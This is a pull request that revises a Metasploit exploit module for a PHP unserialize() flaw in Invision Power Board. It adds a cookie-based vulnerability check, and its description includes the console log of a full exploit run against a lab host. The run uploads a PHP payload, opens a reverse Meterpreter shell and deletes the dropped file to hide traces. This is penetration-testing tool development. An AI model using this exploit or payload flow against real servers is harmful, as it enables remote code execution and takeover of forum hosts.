### PR TITLE
added improvements by egix to invision pboard

### DIFF
--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -87,42 +87,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		@peer = "#{rhost}:#{rport}"
-		res = send_request_raw({'uri'=>"#{base}index.php"})
-		return Exploit::CheckCode::Unknown if not res
+		check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
+		res = send_request_cgi(
+			{
+				'uri' => "#{base}index.php",
+				'method' => 'GET',
+				'cookie' => "#{cookie_prefix}session_id=#{check_str}"
+			})
 
-		version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten
-
-		if not version or version.empty?
-			check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
-
-			res = send_request_cgi(
-				{
-					'uri' => "#{base}index.php",
-					'method' => 'GET',
-					'cookie' => "#{cookie_prefix}session_id=#{check_str}"
-				})
-
-			if res and res.code == 500 or res.body =~ /PHP_Incomplete_Class/
-				return Exploit::CheckCode::Vulnerable
-			end
+		if res and res.code == 500 or res.body =~ /PHP_Incomplete_Class/
+			return Exploit::CheckCode::Vulnerable
+		elsif res and res.code == 200
+			return Exploit::CheckCode::Safe
 		else
-			version = version.map {|e| e.to_i}
-
-			# We only want major version 3
-			# This version checking is based on OSVDB's info
-			return Exploit::CheckCode::Safe if version[0] != 3
-
-			case version[1]
-				when 1
-					return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
-				when 2
-					return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
-				when 3
-					return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
-			end
+			return Exploit::CheckCode::Unknown
 		end
-
-		return Exploit::CheckCode::Safe
 	end
 
 	def on_new_session(client)

--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         =>
 				[
-					'EgiX',         # Vulnerability discovery and PoC
+					'EgiX',         # Vulnerability discovery, PoC, work on check() and cookie_prefix() methods
 					'juan vazquez', # Metasploit module
 					'sinn3r'        # PhpEXE tekniq & check() method
 				],
@@ -69,25 +69,57 @@ class Metasploit3 < Msf::Exploit::Remote
 		return base
 	end
 
+	def cookie_prefix
+		print_status("#{@peer} - Checking for cookie prefix")
+		cookie_prefix = ""
+		res = send_request_cgi(
+			{
+				'uri' => "#{base}index.php",
+				'method' => 'GET'
+			})
+
+		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
+			print_status("#{@peer} - Cookie prefix #{$1} found")
+			cookie_prefix = $1
+		end
+		return cookie_prefix
+	end
+
 	def check
+		@peer = "#{rhost}:#{rport}"
 		res = send_request_raw({'uri'=>"#{base}index.php"})
 		return Exploit::CheckCode::Unknown if not res
 
 		version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten
-		return Exploit::CheckCode::Safe if version.empty?
-		version = version.map {|e| e.to_i}
 
-		# We only want major version 3
-		# This version checking is based on OSVDB's info
-		return Exploit::CheckCode::Safe if version[0] != 3
+		if not version or version.empty?
+			check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
 
-		case version[1]
-		when 1
-			return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
-		when 2
-			return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
-		when 3
-			return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
+			res = send_request_cgi(
+				{
+					'uri' => "#{base}index.php",
+					'method' => 'GET',
+					'cookie' => "#{cookie_prefix}session_id=#{check_str}"
+				})
+
+			if res and res.code == 500 or res.body =~ /PHP_Incomplete_Class/
+				return Exploit::CheckCode::Vulnerable
+			end
+		else
+			version = version.map {|e| e.to_i}
+
+			# We only want major version 3
+			# This version checking is based on OSVDB's info
+			return Exploit::CheckCode::Safe if version[0] != 3
+
+			case version[1]
+				when 1
+					return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
+				when 2
+					return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
+				when 3
+					return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
+			end
 		end
 
 		return Exploit::CheckCode::Safe
@@ -109,20 +141,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
 		@peer = "#{rhost}:#{rport}"
-
-		print_status("#{@peer} - Checking for cookie prefix")
-		res = send_request_cgi(
-		{
-			'uri' => "#{base}index.php",
-			'method' => 'GET'
-		})
-
-		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
-			print_status("#{@peer} - Cookie prefix #{$1} found")
-			cookie_prefix = $1
-		else
-			cookie_prefix = ""
-		end
 
 		# get_write_exec_payload uses a function, which limits our ability to support
 		# Linux payloads, because that requires a space:


### PR DESCRIPTION
Improvements done through redmine:

http://dev.metasploit.com/redmine/issues/7463

Module working after last code adding:

<pre>
msf  exploit(invision_pboard_unserialize_exec) > reload
[*] Reloading module...
msf  exploit(invision_pboard_unserialize_exec) > check

[*] 192.168.1.151:80 - Checking for cookie prefix
[*] 192.168.1.151:80 - Cookie prefix msf found
[+] The target is vulnerable.
msf  exploit(invision_pboard_unserialize_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.151:80 - Exploiting the unserialize() to upload PHP code
[*] 192.168.1.151:80 - Checking for cookie prefix
[*] 192.168.1.151:80 - Cookie prefix msf found
[*] 192.168.1.151:80 - Executing the payload vvDxF.php
[*] Sending stage (39217 bytes) to 192.168.1.151
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.151:44960) at 2012-11-15 01:18:04 +0100
[!] 192.168.1.151:80 - Deleting vvDxF.php
[+] 192.168.1.151:80 - vvDxF.php removed to stay ninja

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...


</pre>
